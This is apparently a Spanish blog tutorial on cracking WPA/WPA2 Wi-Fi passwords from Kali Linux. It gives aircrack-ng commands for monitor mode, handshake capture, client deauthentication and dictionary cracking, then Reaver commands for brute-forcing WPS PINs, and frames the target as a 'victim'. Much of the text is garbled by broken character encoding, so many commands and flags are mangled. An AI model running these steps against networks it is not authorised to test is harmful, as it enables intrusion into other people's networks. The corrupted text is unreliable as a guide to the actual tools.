Métodos Para Hackear WIFI WPA

Métodos para Hackear WIFI WPA/WPA2 desde Kali Linux 2.0 Por

George Labrin /

4 enero, 2016

En Kali Linux tenemos una variedad de herramientas para haer auditoria ! pentesting en redes inal"mbrias# En este aso vamos a obtener la ontrase$a de nuestra vitima on %uer&a bruta# La primera herramienta 'ue usaremos es la m"s onoida ! usada en las pruebas de penetrai(n, es )*irra+ )*irra+ aparte  aparte de haer %uer&a bruta puedes haer una denegai(n de serviio#

¿ué es Aircrack! *irra+-ng es una suite de so%t.are de seguridad inal"mbria# onsiste en un anali&ador de pa'uetes de red, un ra+eador de redes EP ! P*/P*2-PK ! otro onunto de herramientas de auditor3a inal"mbria# Entre las herramientas 'ue se inlu!en en esta suite se enuentran las siguientes •

airbase-ng

•

airra+-ng

•

airdeap-ng

•

airdeloa+-ng

•

airdriver-ng

•

airepla!-ng

•

airmon-ng

•

airodump-ng

•

airolib-ng

•

airserv-ng

•

airtun-ng

•

easside-ng

•

pa+et%orge-ng

•

t+iptun-ng

•

.esside-ng

•

airdeloa+-ng

Las herramientas m"s utili&adas para la auditor3a inal"mbria son •

*irra+-ng 5desi%ra la lave de los vetores de iniio

•

*irodump-ng 5esanea las redes ! aptura vetores de iniio

•

*irepla!-ng 5in!eta tr"7o para elevar la aptura de vetores de iniio

•

*irmon-ng 5establee la tareta inal"mbria en modo monitor, para poder apturar e in!etar vetores

Lo 'ue observamos es el omando i.on7g, el ual se utili&a para visuali&ar ! modi7ar los par"metros de una inter%a& de red 'ue son espe37os para el %unionamiento inal"mbrio 5por eemplo, la inter%a& de nombre, %reuenia, 89# :ambi;n puede ser usado para mostrar las estad3stias inal"mbrias 5Extra3do desde /pro/net/.ireless#

Este omando detiene la inter%a& de red ! luego matan a los proesos los uales pueden inter%erir#

1 < airmon-ng he+ +ill .lan0

*tivando la inter%a& modo de monitor

1 < airmon-ng start .lan0

Nota: Es muy importante parar/matar a los gestores de la red antes de poner una tarjeta en modo monitor! En mi caso me muestra info de mi tarjeta de red y nos nuestra wlan0mon

1 < airodump-ng .lan0mon

omen&ar" sanear para obtener =89 de las redes eranas#

1 airodump-ng - 5hannel --bssid 5=89 -. /root/ .lan0mon •

"c oloamos para el anal 'ue nos muestra en el anterior omando#

•

#$ssid Es el pa'uete de la red inal"mbria#

•

"% >biai(n donde 'uieres 'ue guarde la data#

•

%lan0&on es nuestra inter%a& de red 'ue usamos para el proeso#

1 airepla!-ng -0 0 -a 5=89 - 5tation .lan0mon

Para todos los ata'ues, exepto el de autentiai(n ! el de %alsa autentiai(n, puedes usar los siguientes 7ltros para limitar los pa'uetes 'ue se usar"n# El 7ltro m"s om?n es usar la opi(n )-b para seleionar un punto de aeso determinado# 'pciones de (ltro) •

"$ $ssid) 9irei(n @* del punto de aeso

•

"d d&ac) 9irei(n @* de destino

•

"s s&ac) 9irei(n @* origen 5soure

•

"& len) Longitud m3nima del pa'uete

•

"n len) Longitud m"xima del pa'uete

•

"u t*pe) %rame ontrol, t!pe 7eld

•

"+ su$t) %rame ontrol, subt!pe 7eld

•

"t tods) %rame ontrol, :o 9 bit

•

", ,ro&ds) %rame ontrol, Arom 9 bit

•

"% is%ep) %rame ontrol, EP bit

'pciones de in*ecci-n) •

"x n$pps ) n?mero de pa'uetes por segundo

•

"p ,ctrl ) 7ar palabra )%rame ontrol 5hexadeimal

•

"a $ssid ) 7ar direi(n @* del *P

•

"c d&ac ) 7ar direi(n @* de destino

•

" s&ac ) 7ar direi(n @* origen

•

"e essid ) ata'ue de %alsa autentiai(n nombre del *P

•

" ) ata'ue arp-repla! in!etar pa'uetes Arom9

•

" +alor ) ambiar tama$o de buBer 5de%ault C

•

"k IP ) 7ar 8P de destino en %ragmentos

•

"l IP ) 7ar 8P de origen en %ragmentos

•

"o npckts ) n?mero de pa'uetes por burst 5-1

•

"1 sec ) segundos entre pa'uetes )sigo a'u3 o +eep-alives 5-1

•

"* pra ) +e!stream para autentiai(n ompartida 5shared +e!

1 < airra+-ng -a2 -b 5=89 -. 5diionario 5>=8*8D #ap

*'u3 haemos uso de un diionario para obtener la ontrase$a#

34567' M38'7' Este m;todo lo siento pero lo mega siento por'ue la herramienta muestre errores en el proeso en el video# Por'ue no es ompatibles on la FE9 de mis veinos ni on la mi"# ¿ué es 9ea+er!

Feaver reali&a un ata'ue de %uer&a bruta ontra iAi Proteted n?mero de pin on7gurai(n de un punto de aeso# >na ve& enontrado el P8 P, P* PK puede ser reuperado ! alternativamente la on7gurai(n inal"mbria de la *P se puede on7gurar# @ientras Feaver no soporta la reon7gurai(n de la *P, esto se puede lograr on .pasuppliant ve& 'ue se onoe el pasador P#

1 < .ash -i .lan0mon

Esanear" todas las redes era ! obtendr"n =89, hannel#

1 < reaver -i .lan0mon -b 5=89 -vv -+ 1 2 < reaver -i .lan0mon -b 5=89 - 5hannel - - -vv -+ 1

HEstos son alguno de los m;todos, si est"s interesado ontamos on ursos de seguridad o%ensiva donde pratiamos en laboratorios, paso a paso estos ! otros m;todos de .ireless ha+ing#